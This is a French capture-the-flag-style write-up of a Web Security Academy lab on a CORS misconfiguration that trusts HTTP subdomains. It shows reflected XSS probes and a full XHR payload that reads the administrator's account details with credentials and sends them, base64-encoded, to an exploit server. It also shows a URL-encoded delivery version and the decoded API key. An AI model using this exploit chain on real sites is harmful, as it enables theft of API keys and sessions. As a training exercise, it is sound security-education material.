CORS avec protocoles non sécurisés de confiance

CORS vulnerability with trusted insecure protocols

Lab: CORS vulnerability with trusted insecure protocols | Web Security AcademyWebSecAcademy

Le site a une configuration CORS vulnérable : il fait confiance à tous les sous-domaines, même lorsqu’ils utilisent HTTP. L’objectif est de récupérer la clé API de l’administrateur via CORS et de l’exfiltrer vers le serveur d’exploit.

Identifiants fournis : wiener:peter.Le site a une configuration CORS vulnérable : il fait confiance à tous les sous-domaines, même lorsqu’ils utilisent HTTP. L’objectif est de récupérer la clé API de l’administrateur via CORS et de l’exfiltrer vers le serveur d’exploit.

Identifiants fournis : wiener:peter.

Constatations

Le domaine racine est accepté en HTTP :

Origin: http://0a550036047e216980caa86b00fb0073.web-security-academy.net

Les sous-domaines en HTTP sont également acceptés :

Origin: http://jord4n.0a550036047e216980caa86b00fb0073.web-security-academy.net

Sous-domaine repéré via “check stock” :

https://stock.0a550036047e216980caa86b00fb0073.web-security-academy.net/?productId=1&storeId=1

Ce point reflète productId → injection HTML/JS possible :

?productId=test&storeId=1

?productId=<h1>hello</h1>&storeId=1
?productId=<script>alert(0)</script>&storeId=1

Exploitation (lecture de /accountDetails et exfiltration)

Script XHR utilisé (envoyé via le sous-domaine) :

<script>
  var req=new XMLHttpRequest();
  req.onload = function(){
     location = 'https://exploit-0a1d009204a3210b802ca7e301e500cd.exploit-server.net/?apiKey=' %2b btoa(req.responseText);
};
  req.open('GET', 'https://0a550036047e216980caa86b00fb0073.web-security-academy.net/accountDetails', true);
  req.withCredentials = true;
  req.send();
</script>

Injection du script dans le paramètre productId du sous-domaine vulnérable :

https://stock.0a550036047e216980caa86b00fb0073.web-security-academy.net/?productId=<script>
  var req=new XMLHttpRequest();
  req.onload = function(){
     location = 'https://exploit-0a1d009204a3210b802ca7e301e500cd.exploit-server.net/?apiKey=' %2b btoa(req.responseText);
};
  req.open('GET', 'https://0a550036047e216980caa86b00fb0073.web-security-academy.net/accountDetails', true);
  req.withCredentials = true;
  req.send();
</script>&storeId=1

Redirection vers l’URL d’exploit avec la variable apiKey contenant la réponse encodée.

Charge utile envoyée à la victime (version URL-encodée)

<script>
document.location = 'http://stock.0a550036047e216980caa86b00fb0073.web-security-academy.net/?productId=%3Cscript%3Evar%20req=new%20XMLHttpRequest();req.onload=function(){location=%27https://exploit-0a1d009204a3210b802ca7e301e500cd.exploit-server.net/?apiKey=%27%2bbtoa(req.responseText);};req.open(%27GET%27,%27https://0a550036047e216980caa86b00fb0073.web-security-academy.net/accountDetails%27,true);req.withCredentials=true;req.send();%3C\/script%3E&storeId=1';
</script>

Réception de l’API key sur le serveur d’exploit via le paramètre apiKey.

Décodage effectué avec :

echo -n "ewogICJ1c2VybmFtZSI6ICJhZG1pbmlzdHJhdG9yIiwKICAiZW1haWwiOiAiIiwKICAiYXBpa2V5IjogIllUY0ViOFFLb3F1SE90MTJ4bGt1M1ZoYTlFNk0wbDJIIiwKICAic2Vzc2lvbnMiOiBbCiAgICAiZ25yTGM2UDVEb01uQmxyUTczQ3l6SldBUnJzTXJpYlciCiAgXQp9" | base64 -d

Mis à jour il y a 3 mois

hashtagCORS vulnerability with trusted insecure protocols

hashtagConstatations

hashtagExploitation (lecture de /accountDetails et exfiltration)

hashtagCharge utile envoyée à la victime (version URL-encodée)

CORS vulnerability with trusted insecure protocols

Constatations

Exploitation (lecture de /accountDetails et exfiltration)

Charge utile envoyée à la victime (version URL-encodée)